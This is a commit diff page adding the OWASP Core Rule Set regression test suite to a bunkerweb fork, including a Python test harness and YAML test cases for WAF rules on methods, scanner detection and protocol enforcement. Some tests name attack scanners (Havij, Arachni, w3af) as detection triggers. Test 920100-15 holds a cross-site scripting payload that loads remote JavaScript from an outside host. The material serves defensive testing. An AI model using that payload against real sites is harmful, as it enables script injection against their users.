Makussu/bunkerweb
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

bunkerweb 1.4.0

Browse Source
This commit is contained in:
bunkerity
2022-06-03 17:24:14 +02:00
parent 3a078326c5
commit a9f886804a
5245 changed files with 1432051 additions and 27894 deletions
Download Patch File Download Diff File Expand all files Collapse all files

41
core/modsecurity/files/coreruleset/tests/docker-compose.yml Normal file
View File

@@ -0,0 +1,41 @@
version: '3.1'
# Only one of these will be up at a time for now.
# Concurrency will be on the tests folder we have.
services:
modsec2-apache:
image: owasp/modsecurity-crs:v3.2-modsec2-apache
environment:
- SERVERNAME=modsec2-apache
- MODSEC_RULE_ENGINE=DetectionOnly
- PARANOIA=5
volumes:
- ${GITHUB_WORKSPACE}/logs/modsec2-apache:/var/log/apache2
- ${GITHUB_WORKSPACE}/rules:/etc/modsecurity.d/owasp-crs/rules
ports:
- "80:80"
modsec3-apache:
image: owasp/modsecurity-crs:v3.2-modsec3-apache
environment:
- SERVERNAME=modsec3-apache
- MODSEC_RULE_ENGINE=DetectionOnly
- PARANOIA=5
volumes:
- ${GITHUB_WORKSPACE}/logs/modsec3-apache:/var/log/apache2
- ${GITHUB_WORKSPACE}/rules:/etc/modsecurity.d/owasp-crs/rules
ports:
- "80:80"
modsec3-nginx:
image: owasp/modsecurity-crs:v3.2-modsec3-nginx
environment:
- SERVERNAME=modsec3-nginx
- MODSEC_RULE_ENGINE=DetectionOnly
- PARANOIA=5
volumes:
- ${GITHUB_WORKSPACE}/logs/modsec3-nginx:/var/log/nginx
- ${GITHUB_WORKSPACE}/rules:/etc/modsecurity.d/owasp-crs/rules
ports:
- "80:80"

1
core/modsecurity/files/coreruleset/tests/integration/requirements.txt Normal file
View File

@@ -0,0 +1 @@
pytest>=2.9.1

64
core/modsecurity/files/coreruleset/tests/regression/CRS_Tests.py Normal file
View File

@@ -0,0 +1,64 @@
from ftw import ruleset, logchecker, testrunner
import datetime
import pytest
import sys
import re
import os
def test_crs(ruleset, test, logchecker_obj):
runner = testrunner.TestRunner()
for stage in test.stages:
runner.run_stage(stage, logchecker_obj)
class FooLogChecker(logchecker.LogChecker):
def __init__(self, config):
super(FooLogChecker, self).__init__()
self.log_location = config['log_location_linux']
self.log_date_regex = config['log_date_regex']
self.log_date_format = config['log_date_format']
def reverse_readline(self, filename):
with open(filename) as f:
f.seek(0, os.SEEK_END)
position = f.tell()
line = ''
while position >= 0:
f.seek(position)
next_char = f.read(1)
if next_char == "\n":
yield line[::-1]
line = ''
else:
line += next_char
position -= 1
yield line[::-1]
def get_logs(self):
pattern = re.compile(r'%s' % self.log_date_regex)
our_logs = []
for lline in self.reverse_readline(self.log_location):
# Extract dates from each line
match = re.match(pattern, lline)
if match:
log_date = match.group(1)
log_date = datetime.datetime.strptime(
log_date, self.log_date_format)
# NGINX doesn't give us microsecond level by detail, round down.
if "%f" not in self.log_date_format:
ftw_start = self.start.replace(microsecond=0)
else:
ftw_start = self.start
ftw_end = self.end
if log_date <= ftw_end and log_date >= ftw_start:
our_logs.append(lline)
# If our log is from before FTW started stop
if log_date < ftw_start:
break
return our_logs
@pytest.fixture(scope='session')
def logchecker_obj(config):
return FooLogChecker(config)

63
core/modsecurity/files/coreruleset/tests/regression/README.md Normal file
View File

@@ -0,0 +1,63 @@
owasp-crs-regressions
=====================
Introduction
============
Welcome to the OWASP Core Rule Set regression testing suite. This suite is meant to test specific rules in OWASP CRS version 3. The suite is designed to uses preconfigured IDs that are specific to this version of CRS. The tests themselves can be run without CRS and one would expect the same elements to be blocked, however one must override the default Output parameter in the tests.
Installation
============
The OWASP Core Rule Set project was part of the effort to develop FTW, the Framework for Testing WAFs. As a result, we use this project in order to run our regression testing. FTW is designed to use existing Python testing frameworks to allow for easy to read web based testing, provided in YAML. You can install FTW by from the repository (at https://github.com/CRS-support/ftw) or by running pip.
```pip install -r requirements.txt```
This will install FTW as a library. It can also be run natively, see the FTW documentation for more detail.
Requirements
============
There are Three requirements for running the OWASP CRS regressions.
1. You must have ModSecurity specify the location of your error.log, this is done in the config.py file
2. ModSecurity must be in DetectionOnly (or anomaly scoring) mode
3. You must disable IP blocking based on previous events
Note: The test suite compares timezones -- if your test machine and your host machine are in different timezones this can cause bad results
To accomplish 2. and 3. you may use the following rule in your setup.conf:
```
SecAction "id:900005,\
phase:1,\
nolog,\
pass,\
ctl:ruleEngine=DetectionOnly,\
ctl:ruleRemoveById=910000,\
setvar:tx.paranoia_level=4,\
setvar:tx.crs_validate_utf8_encoding=1,\
setvar:tx.arg_name_length=100,\
setvar:tx.arg_length=400"
```
Once these requirements have been met the tests can be run by using pytest.
Running The Tests
=================
On Windows this will look like:
-------------------------------
Single Rule File:
```py.test.exe -v CRS_Tests.py --rule=tests/test.yaml```
The Whole Suite:
```py.test.exe -v CRS_Tests.py --ruledir_recurse=tests/```
On Linux this will look like:
-----------------------------
Single Rule File:
```py.test -v CRS_Tests.py --rule=tests/test.yaml```
The Whole Suite:
```py.test -v CRS_Tests.py --ruledir_recurse=tests/```
Contributions
=============
We'd like to thank Fastly for their help and support in developing these tests.

0
core/modsecurity/files/coreruleset/tests/regression/__init__.py Normal file
View File

14
core/modsecurity/files/coreruleset/tests/regression/config.ini Normal file
View File

@@ -0,0 +1,14 @@
[modsec2-apache]
log_date_format = %a %b %d %H:%M:%S.%f %Y
log_date_regex = \[([A-Z][a-z]{2} [A-z][a-z]{2} \d{1,2} \d{1,2}\:\d{1,2}\:\d{1,2}\.\d+? \d{4})\]
log_location_linux = /var/log/apache2/error.log
[modsec3-apache]
log_date_format = %a %b %d %H:%M:%S.%f %Y
log_date_regex = \[([A-Z][a-z]{2} [A-z][a-z]{2} \d{1,2} \d{1,2}\:\d{1,2}\:\d{1,2}\.\d+? \d{4})\]
log_location_linux = /var/log/apache2/error.log
[modsec3-nginx]
log_date_format = %Y/%m/%d %H:%M:%S
log_date_regex = (\d{4}\/\d{2}\/\d{2} \d{2}:\d{2}:\d{2})
log_location_linux = /var/log/nginx/error.log

17
core/modsecurity/files/coreruleset/tests/regression/conftest.py Normal file
View File

@@ -0,0 +1,17 @@
try:
import ConfigParser as configparser
except ImportError:
import configparser
import os
import pytest
def pytest_addoption(parser):
parser.addoption('--config', action='store', default='modsec2-apache')
@pytest.fixture(scope='session')
def config(request):
cp = configparser.RawConfigParser()
cp.read(os.path.join(os.path.dirname(__file__), 'config.ini'))
return dict(cp.items(request.config.getoption('--config')))

1
core/modsecurity/files/coreruleset/tests/regression/requirements.txt Normal file
View File

@@ -0,0 +1 @@
ftw==1.1.7

149
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml Normal file
View File

@@ -0,0 +1,149 @@
---
meta:
author: "csanders-git"
enabled: true
name: "911100.yaml"
description: "Description"
tests:
-
test_title: 911100-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"911100\""
-
test_title: 911100-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"911100\""
-
test_title: 911100-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "HEAD"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"911100\""
-
test_title: 911100-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "test=value"
output:
no_log_contains: "id \"911100\""
-
test_title: 911100-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "TEST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"911100\""
-
test_title: 911100-6
desc: Method is not allowed by policy (911100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: DELETE
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "911100"
-
test_title: 911100-7
desc: Method is not allowed by policy (911100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: FOO
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "911100"
-
test_title: 911100-8
desc: Method is not allowed by policy (911100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: SUBSCRIBE
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "911100"

94
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml Normal file
View File

@@ -0,0 +1,94 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 913100.yaml
tests:
-
test_title: 913100-1
desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET
CLR 2.0.50727) Havij
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913100"
-
test_title: 913100-2
desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Arachni/0.2.1
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913100"
-
test_title: 913100-3
desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: w3af.sourceforge.net
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913100"
-
test_title: 913100-4
desc: "Scanner identification based on User-agent field"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "nessus"
uri: "/"
output:
log_contains: id "913100"

49
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913110.yaml Normal file
View File

@@ -0,0 +1,49 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 913110.yaml
tests:
-
test_title: 913110-1
desc: Request Indicates a Security Scanner Scanned the Site (913110) from old modsec
regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Acunetix-Product: WVS/5.0 (Acunetix Web Vulnerability Scanner - EVALUATION)
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET
CLR 2.0.50727)
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913110"
-
test_title: 913110-2
desc: "Scanner identification based on custom header"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
X-Scanner: "whatever"
uri: "/"
output:
log_contains: id "913110"

63
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913120.yaml Normal file
View File

@@ -0,0 +1,63 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 913120.yaml
tests:
-
test_title: 913120-1
desc: Request Indicates a Security Scanner Scanned the Site (913120) from old modsec
regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET
CLR 2.0.50727)
method: GET
port: 80
uri: /nessustest
version: HTTP/1.0
output:
log_contains: id "913120"
-
test_title: 913120-2
desc: IBM fingerprint from (http://www-01.ibm.com/support/docview.wss?uid=swg21293132)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
uri: /AppScan_fingerprint/MAC_ADDRESS_01234567890.html?9ABCDG1
version: HTTP/1.0
output:
log_contains: id "913120"
-
test_title: 913120-3
desc: "Scanner identification based on uri"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
version: HTTP/1.0
uri: "/nessus_is_probing_you_"
output:
log_contains: id "913120"

287
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml Normal file
View File

@@ -0,0 +1,287 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920100.yaml"
description: "Tests to trigger, or not trigger 920100"
tests:
-
# Standard GET request
test_title: 920100-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
-
# Request has tab (\t) before request method - Apache complains
# AH00126: Invalid URI in request GET / HTTP/1.1
test_title: 920100-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: " GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
status: 400
-
# Perfectly valid OPTIONS request
test_title: 920100-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "OPTIONS"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "*"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
-
# Valid CONNECT request however this is disabled by Apache default
test_title: 920100-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "CONNECT"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "1.2.3.4:80"
version: "HTTP/1.1"
output:
status: [405, 403]
-
# invalid Connect request, domains require ports
test_title: 920100-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "CONNECT"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "www.cnn.com"
version: "HTTP/1.1"
output:
status: 400
-
# This is an acceptable CONNECT request for SSL tunneling
test_title: 920100-6
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "CONNECT"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests #FP"
Host: "localhost"
protocol: "http"
uri: "www.cnn.com:80"
version: "HTTP/1.1"
output:
log_contains: "id \"920100\""
-
# Valid request with query and anchor components
test_title: 920100-7
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/index.html?I=Like&Apples=Today#tag"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
-
# The colon in the path is not allowed. Apache will block by default
# (20024)The given path is misformatted or contained invalid characters: [client 127.0.0.1:4142] AH00127: Cannot map GET /index.html:80?I=Like&Apples=Today#tag HTTP/1.1 to file
test_title: 920100-8
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/index.html:80?I=Like&Apples=Today#tag"
version: "HTTP/1.1"
output:
status: [400, 403]
-
# Normal Options request with path
test_title: 920100-9
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "OPTIONS"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
-
# An invalid method with a long name
test_title: 920100-10
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "REALLYLONGUNREALMETHOD"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests # FN"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
log_contains: "id \"920100\""
-
# An invalid request because a backslash is used in uri
# Apache will end up blocking this before it gets to CRS.
# We will need to support OR output tests to fix this
test_title: 920100-11
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests # FN"
Host: "localhost"
protocol: "http"
uri: "\\"
version: "HTTP/1.1"
output:
status: [403, 400]
#log_contains: "id \"920100\""
-
test_title: 920100-12
desc: Invalid HTTP Request Line (920100) - Test 1 from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: "\tGET"
port: 80
uri: /
version: HTTP/1.1
output:
status: 400
-
test_title: 920100-13
desc: Invalid HTTP Request Line (920100) - Test 2 from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: \index.html
version: HTTP\1.0
output:
status: [403, 400]
# log_contains: id "920100"
-
test_title: 920100-14
desc: Invalid HTTP Request Line (920100) - Test 3 from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: '|GET'
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "920100"
-
test_title: 920100-15
desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/demo/xss/xml/vuln.xml.php?input=<script xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location=\"javascript:(function () {var x = document.createElement(\\\"script\\\");x.src = \\\"//sdl.me/popup.js?//\\\";document.childNodes\[0\].appendChild(x);}());\"",1000)</script>&//'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
status: [403, 400]
# log_contains: id "920100"

111
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml Normal file
View File

@@ -0,0 +1,111 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920120.yaml"
description: "Tests to trigger rule 920120"
tests:
-
test_title: 920120-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "*/*"
Accept-Language: "en"
Connection: "close"
Referer: "http://localhost/"
Content-Type: "multipart/form-data; boundary=--------397236876"
data:
- "----------397236876"
- "Content-Disposition: form-data; name=\"fileRap\"; filename=\"file=.txt\""
- "Content-Type: text/plain"
- ""
- "555-555-0199@example.com"
- "----------397236876--"
protocol: "http"
output:
log_contains: "id \"920120\""
-
test_title: 920120-2
desc: Attempted multipart/form-data bypass (920120) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------627652292512397580456702590
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv
method: POST
port: 80
uri: /cgi-bin/fup.cgi
version: HTTP/1.1
data:
- '-----------------------------627652292512397580456702590'
- 'Content-Disposition: form-data; name="fi=le"; filename="test"'
- 'Content-Type: text/plain'
- ''
- 'email: security@modsecurity.org'
- ''
- '-----------------------------627652292512397580456702590'
- 'Content-Disposition: form-data; name="note"'
- ''
- Contact info.
- '-----------------------------627652292512397580456702590--'
output:
log_contains: id "920120"
-
test_title: 920120-3
desc: Invalid Request Body (920120) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.1
data:
- '-----------------------------265001916915724'
- 'Content-Disposition: form-data; name="fi;le"; filename="test"'
- 'Content-Type: application/octet-stream'
- ''
- Rotem & Ayala
- ''
- '-----------------------------265001916915724'
- 'Content-Disposition: form-data; name="name"'
- ''
- tt2
- '-----------------------------265001916915724'
- 'Content-Disposition: form-data; name="B1"'
- ''
- Submit
- '-----------------------------265001916915724--'
output:
log_contains: id "920120"

116
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml Normal file
View File

@@ -0,0 +1,116 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920160.yaml"
description: "Tests to trigger rule 920160"
tests:
-
# Non digit Content-Length without content-type
test_title: 920160-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Length: "NotDigits"
protocol: "http"
uri: "/"
output:
status: 400
-
# Non digit content-length with content-type
test_title: 920160-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "NotDigits"
protocol: "http"
uri: "/"
output:
status: 400
-
# Mixed digit and non digit content length
test_title: 920160-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "123x"
protocol: "http"
uri: "/"
output:
status: 400
-
# Apache auto corrects for this error now so the log should not contain anything
test_title: 920160-4
desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Length: '3'
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.0
data: abc
output:
status: 200
no_log_contains: id "920160"
-
test_title: 920160-5
desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Length: "3;"
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.0
data: abc
output:
status: [200, 403, 400]
# log_contains: id "920160"

127
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml Normal file
View File

@@ -0,0 +1,127 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920170.yaml"
description: "A Selection of tests to trigger rule 920170"
tests:
-
# POST Request with data (valid)
test_title: 920170-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
uri: "/"
output:
no_log_contains: "id \"920170\""
-
# GET request with data
test_title: 920170-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
uri: "/"
output:
log_contains: "id \"920170\""
-
# Head Request with data
test_title: 920170-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "HEAD"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
uri: "/"
output:
log_contains: "id \"920170\""
-
# GET Request but content length is 0 and data is provided
# Weird HTTP 1.0 support bug in Apache, without newline causes 408
test_title: 920170-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests # Possibly shouldn't pass"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "0"
data: "hi=test\r\n"
stop_magic: true
protocol: "http"
uri: "/"
output:
no_log_contains: "id \"920170\""
-
# GET request with content length 0 and no data.
test_title: 920170-6
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "0"
data: ""
protocol: "http"
uri: "/"
output:
no_log_contains: "id \"920170\""
-
test_title: 920170-7
desc: GET or HEAD Request with Body Content (920170) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.0
data: abc
output:
log_contains: id "920170"

90
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml Normal file
View File

@@ -0,0 +1,90 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920180.yaml"
description: "Description"
tests:
-
test_title: 920180-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
protocol: "http"
stop_magic: true
uri: "/"
output:
